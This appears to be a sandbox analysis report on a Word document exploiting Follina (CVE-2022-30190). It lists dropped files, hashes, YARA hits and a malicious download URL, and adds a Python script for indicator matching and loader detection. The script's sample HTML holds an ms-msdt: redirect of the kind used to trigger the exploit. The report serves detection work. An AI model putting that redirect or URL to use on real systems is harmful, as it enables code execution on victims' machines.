Preview: <!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):7402
                                                                                                                                                                Entropy (8bit):5.226010384682191
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdi2UPiqSreh+8G0c:wDwIwERY5V7V2Pijeh+8Dc
                                                                                                                                                                MD5:1752A5A6F9DD417B3B23CAD74B0572DD
                                                                                                                                                                SHA1:F49AEBF28D75BAF7F3BA73B70B475D4669F0D484
                                                                                                                                                                SHA-256:BE10A1D15EBDD53CACBEFB1001DAA750BA33FBEE573A0C4381255AF74A8C78D2
                                                                                                                                                                SHA-512:8D62737424720405830E5E96831C1CDDBDC362EA7EC4D409DC5E05ADA987185115D344943A70BEE0B1EE77FA50B94FD55EDC2662ECB0D030540508BDEF1F58F8
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: SUSP_obfuscated_JS_obfuscatorio, Description: Detect JS obfuscation done by the js obfuscator (often malicious), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7BB121F.htm, Author: @imp0rtp3
                                                                                                                                                                • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7BB121F.htm, Author: Joe Security
                                                                                                                                                                Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1024
                                                                                                                                                                Entropy (8bit):0.05390218305374581
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):5336
                                                                                                                                                                Entropy (8bit):4.3471122529747825
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:2KYZsXTdv9+DFke04mI8qhi/hFo4EbLDq9+y5HnOojH10+3P1mVZTUGeb8h:2Ymf0g8qMZFkTq99nO4C+yZTRgw
                                                                                                                                                                MD5:DCBCBD09496FFA30068D13DF69F6DDC9
                                                                                                                                                                SHA1:8F1F828DB934341494CDA9AEFB514E52159553DD
                                                                                                                                                                SHA-256:4035CBD73EC382B56E017BAF204393451A88E09F4458264BAD57E759B42E3928
                                                                                                                                                                SHA-512:D4053F13B55EB58CEFB0B82431F3E7CC5162F8466F710A387EF2E1577BDFE8831ED7B1FD22C4F8FEFB7947AB36DC54C5EBC691AFD3F670A0089E0A19B9CF34E5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..1.-.E.-.E./. .-.F...A. .F...'./. ...G. ...3... .(.H./... ."...'. .E.3...1. .3.'.2.E.'.F. .*.H.3.7. .E.3.9.H./. .*.:.....1. ...1./.....,.H.'.(.:.....2.-./.1. .E.F.'.(.9. .".E./.G. ...G. .E.-.E./. .-.F...A. .F...'./. .'.2. .7.1...B. .,.D.3.'.*. .B.1.".F... ."...*. .'.D.D.G. .7.'.D.B.'.F... .(.'. .G.E. .".4.F.'. .4./.G. .'.F./. ./.1. .5.H.1.*... ...G. .9.F.H.'.F. .4./.G. . .'.F.G.'. ./.1. .2.F./.'.F. .B.2.D. .B.D.9.G. .(.'. .'.G.E. .".4.F.'. .4./.G. .'.F./.....,.H.'.(.:.......3.-."...'. .E.,.'.G./...F. .........................................................Z...f...h...j...........................................................................................................................................................................................................................................................................$.........A$.a$.gd.z......$.........A$.a$.gd..:.....$.........A$.a$.gdH ......$.........A$.a$.gd.K......$.........A$.a$.gd........$.........A$.a$.gd2N......
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):7402
                                                                                                                                                                Entropy (8bit):5.226010384682191
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdi2UPiqSreh+8G0c:wDwIwERY5V7V2Pijeh+8Dc
                                                                                                                                                                MD5:1752A5A6F9DD417B3B23CAD74B0572DD
                                                                                                                                                                SHA1:F49AEBF28D75BAF7F3BA73B70B475D4669F0D484
                                                                                                                                                                SHA-256:BE10A1D15EBDD53CACBEFB1001DAA750BA33FBEE573A0C4381255AF74A8C78D2
                                                                                                                                                                SHA-512:8D62737424720405830E5E96831C1CDDBDC362EA7EC4D409DC5E05ADA987185115D344943A70BEE0B1EE77FA50B94FD55EDC2662ECB0D030540508BDEF1F58F8
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: SUSP_obfuscated_JS_obfuscatorio, Description: Detect JS obfuscation done by the js obfuscator (often malicious), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htm, Author: @imp0rtp3
                                                                                                                                                                • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htm, Author: Joe Security
                                                                                                                                                                IE Cache URL:https://upgrade.4nmn.com/microsoft.html
                                                                                                                                                                Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
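The entry above is the only one in this section that is both Malicious:true and tied to a URL (the IE cache copy of https://upgrade.4nmn.com/microsoft.html), and its Content.MSO twins carry the same digests. The script below is an added example, not Joe Sandbox code and not the rule logic behind the JoeSecurity_Follina hit: it reproduces the report's MD5/SHA1/SHA-256 and "Entropy (8bit)" fields for a file, checks those digests against the indicators listed above, and applies two heuristics for a Follina loader page that are the author's assumptions about CVE-2022-30190 in general (an ms-msdt: URI reached from script, and filler text padding the document past 4 KiB; the preview above shows the title and lorem ipsum filler but not the script). The sample HTML embedded in the block is constructed for the example and is not the cached file.

```python
"""Triage helpers for dropped or cached files like the ones in this report.

Added example (not Joe Sandbox code). Reproduces the report's per-file digest
and entropy fields, matches against the indicators the report lists for the
cached Follina HTML, and applies two heuristics for a Follina loader page.
The 4 KiB padding threshold and the ms-msdt: check are assumptions about
CVE-2022-30190 loaders in general, not fields taken from the report.
"""
import hashlib
import math
import re
from collections import Counter

# Digests copied from the report for the HTML fetched from
# https://upgrade.4nmn.com/microsoft.html (lower-cased for comparison).
KNOWN_IOCS = {
    "md5": {"1752a5a6f9dd417b3b23cad74b0572dd"},
    "sha1": {"f49aebf28d75baf7f3ba73b70b475d4669f0d484"},
    "sha256": {"be10a1d15ebdd53cacbefb1001daa750ba33fbee573a0c4381255af74a8c78d2"},
}

# Assumption: the loader's script only runs once the fetched HTML exceeds this
# size, which is why Follina pages carry paragraphs of filler text.
MIN_LOADER_SIZE = 4096

MSDT_URI = re.compile(rb"ms-msdt:", re.IGNORECASE)
SCRIPT_TAG = re.compile(rb"<script\b", re.IGNORECASE)
TITLE_TAG = re.compile(rb"<title>\s*(.*?)\s*</title>", re.IGNORECASE | re.DOTALL)


def hashes(data: bytes) -> dict:
    """MD5, SHA1 and SHA-256 of data as lower-case hex (the report's fields)."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte, i.e. the report's 'Entropy (8bit)'.

    0.0 for a constant byte stream, 8.0 when all 256 values are equally likely.
    """
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def matches_known_ioc(data: bytes) -> list:
    """Digest types whose value matches an indicator from the report."""
    return [k for k, v in hashes(data).items() if v in KNOWN_IOCS[k]]


def follina_indicators(data: bytes) -> dict:
    """Heuristic traits of a Follina loader page (assumptions, see docstring)."""
    title = TITLE_TAG.search(data)
    return {
        "has_script": bool(SCRIPT_TAG.search(data)),
        "has_msdt_uri": bool(MSDT_URI.search(data)),
        "padded_past_4k": len(data) >= MIN_LOADER_SIZE,
        "title": title.group(1).decode("utf-8", "replace") if title else "",
    }


def is_suspected_loader(data: bytes) -> bool:
    """Script plus an ms-msdt: URI is the combination that fires."""
    ind = follina_indicators(data)
    return ind["has_script"] and ind["has_msdt_uri"]


def triage(data: bytes) -> dict:
    """One record per file: the report's fields plus the two checks above."""
    return {
        "size": len(data),
        "entropy": round(entropy_8bit(data), 3),
        **hashes(data),
        "ioc_match": matches_known_ioc(data),
        "suspected_follina_loader": is_suspected_loader(data),
    }


# Constructed sample, NOT the cached file from the report: same title, filler
# padding beyond 4 KiB, and an ms-msdt: redirect of the kind Follina loaders use.
SAMPLE_HTML = (
    b"<!doctype html><html><head><title>Good thing we disabled macros</title></head>"
    b"<body><p>" + b"Lorem ipsum dolor sit amet. " * 160 + b"</p>"
    b'<script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force";</script>'
    b"</body></html>"
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

Run it against a real Content.MSO or INetCache\IE file by passing the file's bytes to triage(); a non-empty ioc_match ties the file to this report, while suspected_follina_loader catches re-hosted copies whose digests differ.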
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):9728
                                                                                                                                                                Entropy (8bit):4.799123416316529
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:lKqedmYoNKvUTCSH3gR8H8FgwSHwBmkwZYPaSJ365O1ieMjQZapRnIjlK:cElNK8TCSfHyPmkwZ+vKOWQZwnl
                                                                                                                                                                MD5:6B55DA2550C413C24AD3E6B1452E5E7B
                                                                                                                                                                SHA1:6C1416AB681AAA1F39517F8F48B77FAFFE0E8C19
                                                                                                                                                                SHA-256:AB5C3880822DA837E81B98096E18717BA3920FBA916CBB78621BC4486D3666DB
                                                                                                                                                                SHA-512:86B3C6064FBFE822DA7EB506915D579B3C47CD4A99A822B713D44B280EE1EBD5F67C6BD1DAAE0277024FF73E420923DD66AD71D0974113CB009ABE16BC8F04EA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                File Type:MSVC .res
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):652
                                                                                                                                                                Entropy (8bit):3.113166336265382
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKg3ak7YnqqxggPN5Dlq5J:+RI+ycuZhNAg3akSxggPNnqX
                                                                                                                                                                MD5:41AA8E063AF95F9B5287C042754F33E6
                                                                                                                                                                SHA1:FE7937D8D73DEAF4E3A85436D2F8D9010BA1AE55
                                                                                                                                                                SHA-256:09F50B0A2D3B529DC681202DF0C56E0E0B7ECA7FA3C40EA11C639D46B58F88CF
                                                                                                                                                                SHA-512:9B82FD012B6B1C2EE8DDF8490CFA08DFEB27F0152E8877B63ABF00095432756BDF263CF978AAB9AE302076C79DDC88D7ADC3CDD43B3B0BA8028461062624699B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.5.d.3.m.w.h.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.5.d.3.m.w.h.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3584
                                                                                                                                                                Entropy (8bit):3.0829114689436454
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:6wpqb927GslPnDRjyJsg6u5k1ulFGa3kFq:6c7GycnvGKk
                                                                                                                                                                MD5:5EE54F420D71BD694604C55EC61101C7
                                                                                                                                                                SHA1:FC539201592B67BC72118091EBEF18A099F0A3D4
                                                                                                                                                                SHA-256:ADD44923DF5389FBD0A2D9AB934AA8F58AEC8F2B6282A0372A5CFF6CDD8ACB29
                                                                                                                                                                SHA-512:3B541FD5935FFED3F01DDCE112B22B8D2C98BC0EE717BF714A47F4BF0DAA24763E6643F85C627E4556033689C320E115829D58FA41FD1468D063AF025BD46FB7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                File Type:MSVC .res
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):652
                                                                                                                                                                Entropy (8bit):3.1066989304537183
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry4AvGak7YnqqhAvXPN5Dlq5J:+RI+ycuZhNFGakSkXPNnqX
                                                                                                                                                                MD5:64D94A2D7073F66BD33CC2208133E5A1
                                                                                                                                                                SHA1:1AE59492D9835D00B608907F38431723D64A455C
                                                                                                                                                                SHA-256:B45B662776BA808968323FF4B707C4075A91C7F161B16BCBF272A15EBACE2501
                                                                                                                                                                SHA-512:DA02A91C3842FDCC1012ED32532E0A62308CCB8F9C1D8BDC41BD1937C9940EA38F06769237BB39FA64ACD5D9E5B833260B9AF9E0BCE11FE505BEA55D61AFC3E5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.3.i.2.j.e.o.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.3.i.2.j.e.o.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1364
                                                                                                                                                                Entropy (8bit):4.093394093542085
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:HXC9A+gORmHChKYofWI+ycuZhNAg3akSxggPNnq9Wd:XfORm4KB+1ulna37q9m
                                                                                                                                                                MD5:B897822D7F2477FA514831F0A0882FBF
                                                                                                                                                                SHA1:3314027293FE2F8C3615D05FBBF8F82074B20F88
                                                                                                                                                                SHA-256:ADF0AC910098B2AFADF886AE38F04627E1739213E1D98B6B1D6CADB9BDD18F51
                                                                                                                                                                SHA-512:400C9C28CCD4BC8FD270AC8A970F6A09C4AB91770A439E5BE8F7F0FB9EC4820E9B6DD93F998EAF476CE0C78FDB0BB312A51DA82D72F2AD394FBAF6C9C40735D1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\05d3mwhu\CSC34F94DCCCDC94BCAA3A860A33C1ABBE2.TMP...............A...:._.R..BuO3...........3.......C:\Users\user\AppData\Local\Temp\RES753.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.5.d.3.m.w.h.u...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1364
                                                                                                                                                                Entropy (8bit):4.094913004626319
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:HA6C9AWPsShHfhhKYofII+ycuZhNAGakSxXPNnq9Wd:gIWPs2/vKBg1ulva3Dq9m
                                                                                                                                                                MD5:3FBFF0F714DC160A13352A9E252DF432
                                                                                                                                                                SHA1:FBDD29FF083E62B770F3F1EC8DBA6438A3AAA1C1
                                                                                                                                                                SHA-256:0FDD6AB3D6BD5AE7838468B731E61444EF8F68FED25D927E5E6D60929556E2DC
                                                                                                                                                                SHA-512:2BBACE52092DB94117C7EFD2EC2B57AAD26DFE7936533614BB13997DFE7AEDEE9137D0CE5A45B7E9CFD8FFFA200ACF0E0441AEC7C772E5B468AFDA9E162D456F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\qghxibcc\CSC6B59943BD49B40F0B0C17D73652F0B2.TMP................0..\.....Jg0[d...........4.......C:\Users\user\AppData\Local\Temp\RESAD7B.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.g.h.x.i.b.c.c...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1364
                                                                                                                                                                Entropy (8bit):4.088490273219004
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:HNC9AWP1CShHRWhKYofII+ycuZhNFGakSkXPNnq9Wd:ZWP1DxMKBg1ulFGa3kFq9m
                                                                                                                                                                MD5:600AC2E5970E32A5DA57BE0C93D017EF
                                                                                                                                                                SHA1:06F10F379B39E8FEFFB432C9E4CC2CC331050C63
                                                                                                                                                                SHA-256:C7763EC0DD6195FEC69739C4989AE6E7345A4D992F38C95378B7ADF1942812A3
                                                                                                                                                                SHA-512:8F3D7FD02B8F0A16A2568BBCC75E4572A68AA1B5D54FF2242DAB08EB582C352C8CE4227382CB72054A87F7E891881E495E785813C71D38800EC141B4CBA4CB11
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\53i2jeo5\CSCF157ADCDF084F15A343B1EBC149E5EE.TMP................d.J-ps.k.<. .3...........4.......C:\Users\user\AppData\Local\Temp\RESC028.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.3.i.2.j.e.o.5...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:1
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:1
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                File Type:MSVC .res
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):652
                                                                                                                                                                Entropy (8bit):3.104317053724279
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryxcGak7YnqqCcXPN5Dlq5J:+RI+ycuZhNAGakSxXPNnqX
                                                                                                                                                                MD5:308FB15C011DC817C9944A67305B64F8
                                                                                                                                                                SHA1:4B90035BB888FDFD8FDA6D83EFC1755C4E37CB98
                                                                                                                                                                SHA-256:6D463DB808FFF01DB60C1B3C51540BCA82F093FD02851778D0E301F0ADEB7109
                                                                                                                                                                SHA-512:C0117DE1D59FFBDC34149FD777F1109F80C4E5717D3CDDDBC58A30ACFB4979480478523B9CE4882BE8F0C35BEF44CFAAF34430CF3A29E8E2FBF7546B99DD736A
                                                                                                                                                                Malicious:false
